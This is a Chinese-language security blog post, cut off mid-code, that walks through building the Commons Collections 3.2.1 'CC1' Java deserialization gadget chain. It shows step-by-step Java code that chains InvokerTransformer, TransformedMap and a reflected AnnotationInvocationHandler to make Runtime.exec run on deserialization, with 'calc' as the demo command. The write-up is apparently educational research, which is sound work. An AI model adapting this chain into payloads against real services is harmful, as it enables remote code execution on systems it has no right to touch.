<!doctype html>
<html lang="zh"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><title>Java反序列化 CC1链分析 - WayneJH Blog</title><link rel="manifest" href="/manifest.json"><meta name="application-name" content="WayneJH Blog"><meta name="msapplication-TileImage" content="https://oss.waynejoons.icu/picphoto/favicon.ico"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-title" content="WayneJH Blog"><meta name="apple-mobile-web-app-status-bar-style" content="default"><meta name="description" content="Welcome to WayneJH Blog - CTF writeups and cybersecurity insights. Here you can learn a lot about cybersecurity knowledge"><meta property="og:type" content="blog"><meta property="og:title" content="Java反序列化 CC1链分析"><meta property="og:url" content="https://waynejoon.github.io/posts/java-cc1-gadget-chain-analysis/"><meta property="og:site_name" content="WayneJH Blog"><meta property="og:description" content="Welcome to WayneJH Blog - CTF writeups and cybersecurity insights. Here you can learn a lot about cybersecurity knowledge"><meta property="og:locale" content="zh_CN"><meta property="og:image" content="https://waynejoon.github.io/img/waynejoon.jpg"><meta property="article:published_time" content="2025-10-04T14:26:34.000Z"><meta property="article:modified_time" content="2025-10-04T14:28:42.896Z"><meta property="article:author" content="WayneJoon.H"><meta property="article:tag" content="代码审计"><meta property="article:tag" content="CC链分析"><meta property="twitter:card" content="summary"><meta property="twitter:image:src" content="https://waynejoon.github.io/img/waynejoon.jpg"><script type="application/ld+json">{"@context":"https://schema.org","@type":"BlogPosting","mainEntityOfPage":{"@type":"WebPage","@id":"https://waynejoon.github.io/posts/java-cc1-gadget-chain-analysis/"},"headline":"Java反序列化 CC1链分析","image":["https://waynejoon.github.io/img/waynejoon.jpg"],"datePublished":"2025-10-04T14:26:34.000Z","dateModified":"2025-10-04T14:28:42.896Z","author":{"@type":"Person","name":"WayneJoon.H"},"publisher":{"@type":"Organization","name":"WayneJH Blog","logo":{"@type":"ImageObject","url":{"text":"WayneJH"}}},"description":"Java反序列化安全 CC1链复现与分析"}</script><link rel="canonical" href="https://waynejoon.github.io/posts/java-cc1-gadget-chain-analysis/"><link rel="icon" href="https://oss.waynejoons.icu/picphoto/favicon.ico"><link rel="stylesheet" href="https://use.fontawesome.com/releases/v6.0.0/css/all.css"><link data-pjax rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@11.7.0/styles/atom-one-light.css"><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Ubuntu:wght@400;600&amp;family=Source+Code+Pro"><link data-pjax rel="stylesheet" href="/css/default.css"><style>body>.footer,body>.navbar,body>.section{opacity:0}</style><!--!--><!--!--><!--!--><script src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" defer></script><!--!--><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/lightgallery@1.10.0/dist/css/lightgallery.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/justifiedGallery@3.8.1/dist/css/justifiedGallery.min.css"><!--!--><!--!--><!--!--><style>.pace{-webkit-pointer-events:none;pointer-events:none;-webkit-user-select:none;-moz-user-select:none;user-select:none}.pace-inactive{display:none}.pace .pace-progress{background:#3273dc;position:fixed;z-index:2000;top:0;right:100%;width:100%;height:2px}</style><script src="https://cdn.jsdelivr.net/npm/pace-js@1.2.4/pace.min.js"></script><!--!--><!--!--><!-- hexo injector head_end start --><script>
  (function () {
      function switchTab() {
          if (!location.hash) {
            return;
          }

          const id = '#' + CSS.escape(location.hash.substring(1));
          const $tabMenu = document.querySelector(`.tabs a[href="${id}"]`);
          if (!$tabMenu) {
            return;
          }

          const $tabMenuContainer = $tabMenu.parentElement.parentElement;
          Array.from($tabMenuContainer.children).forEach($menu => $menu.classList.remove('is-active'));
          Array.from($tabMenuContainer.querySelectorAll('a'))
              .map($menu => document.getElementById($menu.getAttribute("href").substring(1)))
              .forEach($content => $content.classList.add('is-hidden'));

          if ($tabMenu) {
              $tabMenu.parentElement.classList.add('is-active');
          }
          const $activeTab = document.querySelector(id);
          if ($activeTab) {
              $activeTab.classList.remove('is-hidden');
          }
      }
      switchTab();
      window.addEventListener('hashchange', switchTab, false);
  })();
  </script><!-- hexo injector head_end end --><meta name="generator" content="Hexo 7.3.0"><link rel="alternate" href="/atom.xml" title="WayneJH Blog" type="application/atom+xml">
</head><body class="is-3-column"><nav class="navbar navbar-main"><div class="container navbar-container"><div class="navbar-brand justify-content-center"><a class="navbar-item navbar-logo" href="/">WayneJH</a></div><div class="navbar-menu"><div class="navbar-start"><a class="navbar-item" href="/">首页</a><a class="navbar-item" href="/archives">归档</a><a class="navbar-item" href="/categories">分类</a><a class="navbar-item" href="/tags">标签</a><a class="navbar-item" href="/links">友链</a><a class="navbar-item" href="/about">关于</a></div><div class="navbar-end"><a class="navbar-item" target="_blank" rel="noopener" title="GitHub" href="https://github.com/waynejoon"><i class="fab fa-github"></i></a><a class="navbar-item is-hidden-tablet catalogue" title="目录" href="javascript:;"><i class="fas fa-list-ul"></i></a><a class="navbar-item search" title="搜索" href="javascript:;"><i class="fas fa-search"></i></a></div></div></div></nav><section class="section"><div class="container"><div class="columns"><div class="column order-2 column-main is-8-tablet is-8-desktop is-8-widescreen"><div class="card"><article class="card-content article" role="article"><div class="article-meta is-size-7 is-uppercase level is-mobile"><div class="level-left"><span class="level-item"><time dateTime="2025-10-04T14:26:34.000Z" title="2025/10/4 22:26:34">2025-10-04</time>发表</span><span class="level-item"><a class="link-muted" href="/categories/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/">代码审计</a></span><span class="level-item">22 分钟读完 (大约3366个字)</span><span class="level-item" id="busuanzi_container_page_pv" style="display:none"><span id="busuanzi_value_page_pv">--</span>次访问</span></div></div><h1 class="title is-3 is-size-4-mobile">Java反序列化 CC1链分析</h1><div class="content"><h2 id="CC1链子介绍"><a href="#CC1链子介绍" class="headerlink" title="CC1链子介绍"></a>CC1链子介绍</h2><p>Commons Collections是Apache开源社区推出的一款针对Java集合框架的扩展工具库，它提供了大量额外的数据结构和算法，包括有序集合、队列、堆、双向映射等功能丰富的集合实现，以及诸如过滤、转换等高级操作接口。该库极大地补充和完善了Java标准集合API，让开发者在处理复杂集合数据时更加高效灵活，同时简化了代码编写，是Java项目中广泛应用的实用工具</p>
<p>CC1链分国内（<code>TransformedMap</code>）和国外（<code>LazyMap</code>），本文介绍的是国内的<code>TransformedMap</code>链，该链相比国外，结构更为直接，调用链清晰，适合快速构造验证和理解</p>
<h2 id="环境准备"><a href="#环境准备" class="headerlink" title="环境准备"></a>环境准备</h2><h3 id="下载安装-JDK-8u65"><a href="#下载安装-JDK-8u65" class="headerlink" title="下载安装 JDK-8u65"></a>下载安装 JDK-8u65</h3><p>官网：<a target="_blank" rel="noopener" href="https://www.oracle.com/cn/java/technologies/javase/javase8-archive-downloads.html">Java 存档下载 — Java SE 8 | Oracle 中国</a></p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250927103032876.png"></p>
<p>安装之后配置到IDEA，在右上角文件处打开项目结构，或者直接用快捷键 <code>Ctrl+Alt+Shift+S</code> 打开</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250927103148260.png"></p>
<p>然后在项目处选择SDK为<code>JDK 1.8.0_65</code></p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250927103457215.png"></p>
<h3 id="通过Maven下载CommonsCollections3-2-1"><a href="#通过Maven下载CommonsCollections3-2-1" class="headerlink" title="通过Maven下载CommonsCollections3.2.1"></a>通过Maven下载CommonsCollections3.2.1</h3><p>复制以下代码到<code>pom.xml</code>的<code>&lt;dependencies&gt;</code>标签里面</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">dependency</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">groupId</span>&gt;</span>commons-collections<span class="tag">&lt;/<span class="name">groupId</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">artifactId</span>&gt;</span>commons-collections<span class="tag">&lt;/<span class="name">artifactId</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">version</span>&gt;</span>3.2.1<span class="tag">&lt;/<span class="name">version</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">dependency</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p><img src="https://oss.waynejoons.icu/picphoto/20250927104212668.png"></p>
<p>保存即可</p>
<h3 id="配置对应源码"><a href="#配置对应源码" class="headerlink" title="配置对应源码"></a>配置对应源码</h3><p>jdk自带的包里面有些文件是反编译的<code>.class</code>文件，不利于研究分析，为方便调试，我们安装对应的源码</p>
<p>下载地址：<a target="_blank" rel="noopener" href="https://hg.openjdk.org/jdk8u/jdk8u/jdk/rev/af660750b2f4">jdk8u&#x2F;jdk8u&#x2F;jdk: af660750b2f4</a></p>
<p>点击zip下载压缩包，然后自行解压</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250927110349349.png"></p>
<p>在我们之前安装的<code>jdk8u_65</code>文件夹中，找到<code>src.zip</code>的压缩包，解压到当前文件夹下，然后把<code>jdk-af660750b2f4\src\share\classes</code>里的sun文件夹复制到<code>jdk8u_65</code>文件夹中的src里面</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250927111213011.png"></p>
<p>接着打开IDEA，在项目结构（<code>Ctrl+Alt+Shift+S</code>）里面找到SDK处，在源路径添加<code>jdk8u_65</code>的src文件夹，保存</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250927111423167.png"></p>
<p>到这里就配置完成了，可以开始调试分析了</p>
<h2 id="CC1链分析"><a href="#CC1链分析" class="headerlink" title="CC1链分析"></a>CC1链分析</h2><h3 id="利用点"><a href="#利用点" class="headerlink" title="利用点"></a>利用点</h3><p>CC1源头就是Commons Collections库中的<code>Tranformer</code>接口，里面有个<code>transform</code>方法</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250927133715573.png"></p>
<p>寻找继承了这个接口的类，看看<code>transform</code>方法是如何实现的，可以快捷键<code>Ctrl+Alt+B</code>快速查看实现方法</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250927135856858.png"></p>
<p>发现<code>InvokerTransformer</code>类继承了该接口，重写了<code>transform</code>方法，同时还继承了<code>Serializable</code>接口，符合我们的要求</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250927140059900.png"></p>
<p>可以看到，这些参数都是可以控制的，那我们利用这点，传入参数调用<code>invoke</code>函数就可以触发任意类任意方法</p>
<p>我们的目标是实现<code>Runtime.getRuntime().exec(&quot;calc&quot;);</code></p>
<p>构建以下代码实现，方法名为<code>exec</code>，参数类型为<code>String</code>，值为<code>calc</code></p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">test2</span> &#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception &#123;</span><br><span class="line">        <span class="type">Runtime</span> <span class="variable">r</span> <span class="operator">=</span> Runtime.getRuntime();</span><br><span class="line">        <span class="type">InvokerTransformer</span> <span class="variable">invokerTransformer</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(<span class="string">&quot;exec&quot;</span>, <span class="keyword">new</span> <span class="title class_">Class</span>[]&#123;String.class&#125;, <span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;<span class="string">&quot;calc&quot;</span>&#125;);</span><br><span class="line">        invokerTransformer.transform(r);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>成功弹出计算器</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250927141103994.png"></p>
<h3 id="溯源"><a href="#溯源" class="headerlink" title="溯源"></a>溯源</h3><p>接下来就是一步步回溯，寻找可以利用的类，直到到达重写后的<code>readObject()</code>方法</p>
<p>首先先寻找有哪些类的哪些方法调用了<code>transform</code>，右键点击查找用法（或者<code>Alt+F7</code>）</p>
<p>发现<code>TransformedMap</code>类的<code>checkSetValue</code>方法调用了<code>transform</code></p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250929140804672.png"></p>
<p>再看看<code>TransformedMap</code>类的构造函数，可以看到由三个参数组成</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250929141101281.png"></p>
<p>其中第一个参数为<code>Map</code>类型，我们可以传入<code>HashMap</code>，第二和第三个参数为<code>Transformer</code>类型，同样可控</p>
<p>但是需要注意的是，<code>TransformedMap</code>构造函数属于<code>Protected</code>方法，不能通过外部直接调用，但很巧的是，在<code>TransformedMap</code>类找到了<code>decorate</code>方法，返回一个<code>TransformedMap</code>的实例对象，且属于<code>Public static</code>方法，外部可以直接调用</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250929142026206.png"></p>
<p>那我们可以构造代码，第一个参数传入<code>map</code>，第二个用不到就传个null，第三个参数传入<code>invokerTransformer</code></p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">Runtime</span> <span class="variable">r</span> <span class="operator">=</span> Runtime.getRuntime();</span><br><span class="line"><span class="type">InvokerTransformer</span> <span class="variable">invokerTransformer</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(<span class="string">&quot;exec&quot;</span>, <span class="keyword">new</span> <span class="title class_">Class</span>[]&#123;String.class&#125;, <span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;<span class="string">&quot;calc&quot;</span>&#125;);</span><br><span class="line">Map&lt;Object, Object&gt; map = <span class="keyword">new</span> <span class="title class_">HashMap</span>&lt;&gt;();</span><br><span class="line">Map&lt;Object, Object&gt; transformermap = TransformedMap.decorate(map,<span class="literal">null</span>,invokerTransformer);</span><br></pre></td></tr></table></figure>

<p>接下来就是要找哪里调用了<code>checkSetValue</code>方法，右键查找用法</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250929145517746.png"></p>
<p>发现有且仅有一处调用了<code>checkSetValue</code>方法，类名为<code>AbstractInputCheckedMapDecorator</code>，然后<code>TransformedMap</code>类刚好又继承了<code>AbstractInputCheckedMapDecorator</code>类</p>
<p>而<code>AbstractInputCheckedMapDecorator</code>类又继承了<code>AbstractMapDecorator</code></p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250929150113874.png"></p>
<p><code>AbstractMapDecorator</code>实现了Map接口</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250929150412316.png"></p>
<p>而Map接口里的Entry有<code>setValue</code>方法，也就是说<code>AbstractInputCheckedMapDecorator</code>重写了<code>setValue</code>方法，而重写后的方法调用了<code>checkSetValue</code>，刚好符合我们的要求</p>
<p>因此我们对Map进行遍历，使其调用重写后的<code>setValue</code>方法，进而调用<code>checkSetValue</code>，执行命令</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">test2</span> &#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception &#123;</span><br><span class="line">        <span class="type">Runtime</span> <span class="variable">r</span> <span class="operator">=</span> Runtime.getRuntime();</span><br><span class="line">        <span class="type">InvokerTransformer</span> <span class="variable">invokerTransformer</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(<span class="string">&quot;exec&quot;</span>, <span class="keyword">new</span> <span class="title class_">Class</span>[]&#123;String.class&#125;, <span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;<span class="string">&quot;calc&quot;</span>&#125;);</span><br><span class="line"><span class="comment">//        invokerTransformer.transform(r);</span></span><br><span class="line">        Map&lt;Object, Object&gt; map = <span class="keyword">new</span> <span class="title class_">HashMap</span>&lt;&gt;();</span><br><span class="line">        map.put(<span class="string">&quot;hello&quot;</span>,<span class="string">&quot;world&quot;</span>);</span><br><span class="line">        Map&lt;Object, Object&gt; transformermap = TransformedMap.decorate(map,<span class="literal">null</span>,invokerTransformer);</span><br><span class="line">        <span class="keyword">for</span>(Map.Entry entry:transformermap.entrySet())&#123;</span><br><span class="line">            entry.setValue(r);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><img src="https://oss.waynejoons.icu/picphoto/20251004213455658.png"></p>
<p>成功弹出计算器</p>
<p>接下来我们继续分析，寻找哪些方法调用了<code>setValue</code>，右键查找用法</p>
<p>发现<code>AnnotationInvocationHandler</code>类的<code>readObject</code>方法调用了<code>setValue</code>，刚好满足我们的要求，也寻到了入口，一举两得</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250929195017952.png"></p>
<p>查看<code>AnnotationInvocationHandler</code>的构造函数，参数为一个Class对象和一个Map对象，其中Class对象继承自<code>Annotation</code>，需要我们传一个注解类进去，然后<code>memberValues</code>传入之前的<code>transformermap</code></p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250929195540206.png"></p>
<p>再看看<code>AnnotationInvocationHandler</code>的访问权限，发现并没有<code>Public</code>等访问修饰符，则默认表示<code>Package-local</code>方法，即只能在同一个包下访问，在包外的类中是不可见的，无法调用</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250929200113453.png"></p>
<p>但可以通过反射调用方法<code>getDeclaredConstructor</code>来获取声明构造函数，简单修改后就可以实现包外调用，这里介绍一下与<code>getConstructor</code>的区别</p>
<table>
<thead>
<tr>
<th align="left">方法</th>
<th align="left">查找范围</th>
<th align="left">返回哪些方法</th>
<th align="left">是否支持私有&#x2F;受保护方法</th>
</tr>
</thead>
<tbody><tr>
<td align="left">getDeclaredConstructor 获取声明方法</td>
<td align="left">只查本类</td>
<td align="left">所有声明（包括私有、受保护等）</td>
<td align="left">支持（需 setAccessible(true)）</td>
</tr>
<tr>
<td align="left">getConstructor 获取方法</td>
<td align="left">本类和父类链</td>
<td align="left">仅public方法（含继承）</td>
<td align="left">不支持</td>
</tr>
</tbody></table>
<p>因此我们通过反射来获取这个类，修改访问权限后就可以在外部调用了</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">Class</span> <span class="variable">c</span> <span class="operator">=</span> Class.forName(<span class="string">&quot;sun.reflect.annotation.AnnotationInvocationHandler&quot;</span>);</span><br><span class="line"><span class="type">Constructor</span> <span class="variable">annotationConstructor</span> <span class="operator">=</span> c.getDeclaredConstructor(Class.class, Map.class);<span class="comment">//获取构造器</span></span><br><span class="line">annotationConstructor.setAccessible(<span class="literal">true</span>);<span class="comment">//修改访问权限</span></span><br><span class="line"><span class="type">Object</span> <span class="variable">o</span> <span class="operator">=</span> annotationConstructor.newInstance(Override.class,transformermap);</span><br></pre></td></tr></table></figure>

<p>拼接上之前的内容，就形成骨架，完成百分之七八十了</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">test2</span> &#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception &#123;</span><br><span class="line">        <span class="type">Runtime</span> <span class="variable">r</span> <span class="operator">=</span> Runtime.getRuntime();</span><br><span class="line">        <span class="type">InvokerTransformer</span> <span class="variable">invokerTransformer</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(<span class="string">&quot;exec&quot;</span>, <span class="keyword">new</span> <span class="title class_">Class</span>[]&#123;String.class&#125;, <span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;<span class="string">&quot;calc&quot;</span>&#125;);</span><br><span class="line"><span class="comment">//        invokerTransformer.transform(r);</span></span><br><span class="line">        Map&lt;Object, Object&gt; map = <span class="keyword">new</span> <span class="title class_">HashMap</span>&lt;&gt;();</span><br><span class="line">        map.put(<span class="string">&quot;hello&quot;</span>,<span class="string">&quot;world&quot;</span>);</span><br><span class="line">        Map&lt;Object, Object&gt; transformermap = TransformedMap.decorate(map,<span class="literal">null</span>,invokerTransformer);</span><br><span class="line"><span class="comment">//        for(Map.Entry entry:transformermap.entrySet())&#123;</span></span><br><span class="line"><span class="comment">//            entry.setValue(r);</span></span><br><span class="line"><span class="comment">//        &#125;</span></span><br><span class="line">        <span class="type">Class</span> <span class="variable">c</span> <span class="operator">=</span> Class.forName(<span class="string">&quot;sun.reflect.annotation.AnnotationInvocationHandler&quot;</span>);</span><br><span class="line">        <span class="type">Constructor</span> <span class="variable">annotationConstructor</span> <span class="operator">=</span> c.getDeclaredConstructor(Class.class, Map.class);</span><br><span class="line">        annotationConstructor.setAccessible(<span class="literal">true</span>);</span><br><span class="line">        <span class="type">Object</span> <span class="variable">o</span> <span class="operator">=</span> annotationConstructor.newInstance(Override.class,transformermap);</span><br><span class="line">        serialize(o);</span><br><span class="line">        unserialize(<span class="string">&quot;cc1.txt&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">serialize</span><span class="params">(Object obj)</span> <span class="keyword">throws</span> Exception&#123;</span><br><span class="line">        <span class="type">ObjectOutputStream</span> <span class="variable">oos</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ObjectOutputStream</span>(<span class="keyword">new</span> <span class="title class_">FileOutputStream</span>(<span class="string">&quot;cc1.txt&quot;</span>));</span><br><span class="line">        oos.writeObject(obj);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">unserialize</span><span class="params">(String filename)</span> <span class="keyword">throws</span> Exception&#123;</span><br><span class="line">        <span class="type">ObjectInputStream</span> <span class="variable">ois</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ObjectInputStream</span>(<span class="keyword">new</span> <span class="title class_">FileInputStream</span>(filename));</span><br><span class="line">        ois.readObject();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>但如果直接运行是不行的，这也就是剩下的百分之二三十需要我们解决的问题了</p>
<h3 id="待解决问题"><a href="#待解决问题" class="headerlink" title="待解决问题"></a>待解决问题</h3><p>分析之前的代码，发现有三个明显的问题尚未解决</p>
<p><strong>问题一：</strong><code>Runtime</code>类没有继承<code>Serializable</code>接口，无法序列化</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250929202216688.png"></p>
<p><strong>问题二：</strong><code>readObject()</code>方法怎样通过两个if判断进入<code>setValue()</code>方法</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250929202121092.png"></p>
<p><strong>问题三</strong>：<code>readObject</code>方法里的<code>setValue</code>参数不可控</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250929201915202.png"></p>
<p>我们按顺序逐个解决以上问题</p>
<h3 id="修补"><a href="#修补" class="headerlink" title="修补"></a>修补</h3><p><strong>问题一：</strong></p>
<p>首先解决第一个问题，虽然<code>Runtime</code>类没有继承<code>Serializable</code>接口，但是<code>Class</code>类继承了<code>Serializable</code>，当<code>Runtime</code>在 JVM 加载后，会有唯一的 <code>Class&lt;Runtime&gt;</code> 实例，它是对 <code>Runtime</code> 这个类型的描述。我们可以通过反射实现<code>Runtime</code>类</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20251003191831982.png"></p>
<p>构造以下代码反射实现<code>Runtime</code>类</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">Class</span> <span class="variable">cs</span> <span class="operator">=</span> Runtime.class;</span><br><span class="line"><span class="type">Method</span> <span class="variable">getRuntime</span> <span class="operator">=</span> cs.getMethod(<span class="string">&quot;getRuntime&quot;</span>, <span class="literal">null</span>);<span class="comment">// 第二个null表示参数内容，加不加都可以</span></span><br><span class="line"><span class="type">Runtime</span> <span class="variable">cmd</span> <span class="operator">=</span> (Runtime) getRuntime.invoke(<span class="literal">null</span>, <span class="literal">null</span>);<span class="comment">// 第一个null表示调用静态方法，第二个null同上</span></span><br><span class="line"><span class="type">Method</span> <span class="variable">control</span> <span class="operator">=</span> cs.getMethod(<span class="string">&quot;exec&quot;</span>, String.class);</span><br><span class="line">control.invoke(cmd, <span class="string">&quot;calc&quot;</span>);</span><br></pre></td></tr></table></figure>

<p><img src="https://oss.waynejoons.icu/picphoto/20251003194141020.png"></p>
<p>验证一下，成功弹出计算器</p>
<p>然后改用<code>InvokerTransformer</code>的<code>transform</code>实现以上代码</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">Class</span> <span class="variable">cs</span> <span class="operator">=</span> Runtime.class;</span><br><span class="line"><span class="comment">//  Method getRuntime = cs.getMethod(&quot;getRuntime&quot;, null);</span></span><br><span class="line"><span class="comment">//  Runtime cmd = (Runtime) getRuntime.invoke(null, null);</span></span><br><span class="line"><span class="comment">//  Method control = cs.getMethod(&quot;exec&quot;, String.class);</span></span><br><span class="line"><span class="comment">//  control.invoke(cmd, &quot;calc&quot;);</span></span><br><span class="line"><span class="type">Method</span> <span class="variable">getRuntime</span> <span class="operator">=</span> (Method) <span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(<span class="string">&quot;getMethod&quot;</span>, <span class="keyword">new</span> <span class="title class_">Class</span>[]&#123;String.class, Class[].class&#125;, <span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;<span class="string">&quot;getRuntime&quot;</span>, <span class="literal">null</span>&#125;).transform(cs);</span><br><span class="line"><span class="type">Runtime</span> <span class="variable">cmd</span> <span class="operator">=</span> (Runtime) <span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(<span class="string">&quot;invoke&quot;</span>, <span class="keyword">new</span> <span class="title class_">Class</span>[]&#123;Object.class, Object[].class&#125;, <span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;<span class="literal">null</span>, <span class="literal">null</span>&#125;).transform(getRuntime);</span><br><span class="line"><span class="keyword">new</span> <span class="title class_">InvokerTransformer</span>(<span class="string">&quot;exec&quot;</span>, <span class="keyword">new</span> <span class="title class_">Class</span>[]&#123;String.class&#125;, <span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;<span class="string">&quot;calc&quot;</span>&#125;).transform(cmd);</span><br></pre></td></tr></table></figure>

<p>但是分开的话不好处理，需要找个方法合并起来，回到一开始的<code>Transformer.java</code>右键<code>transform</code>查找用法，发现<code>ChainedTransformer</code>的<code>transform</code>方法可以循环遍历<code>transform</code></p>
<p><img src="https://oss.waynejoons.icu/picphoto/20251003210419055.png"></p>
<p>看看构造函数，要求传个数组</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20251003210543902.png"></p>
<p>那我们可以构造以下代码实现</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">Class</span> <span class="variable">cs</span> <span class="operator">=</span> Runtime.class;</span><br><span class="line"><span class="comment">//  Method getRuntime = (Method) new InvokerTransformer(&quot;getMethod&quot;, new Class[]&#123;String.class, Class[].class&#125;, new Object[]&#123;&quot;getRuntime&quot;, null&#125;).transform(cs);</span></span><br><span class="line"><span class="comment">//  Runtime cmd = (Runtime) new InvokerTransformer(&quot;invoke&quot;, new Class[]&#123;Object.class, Object[].class&#125;, new Object[]&#123;null, null&#125;).transform(getRuntime);</span></span><br><span class="line"><span class="comment">//  new InvokerTransformer(&quot;exec&quot;, new Class[]&#123;String.class&#125;, new Object[]&#123;&quot;calc&quot;&#125;).transform(cmd);</span></span><br><span class="line">Transformer[] transformers = <span class="keyword">new</span> <span class="title class_">Transformer</span>[]&#123;</span><br><span class="line">	<span class="keyword">new</span> <span class="title 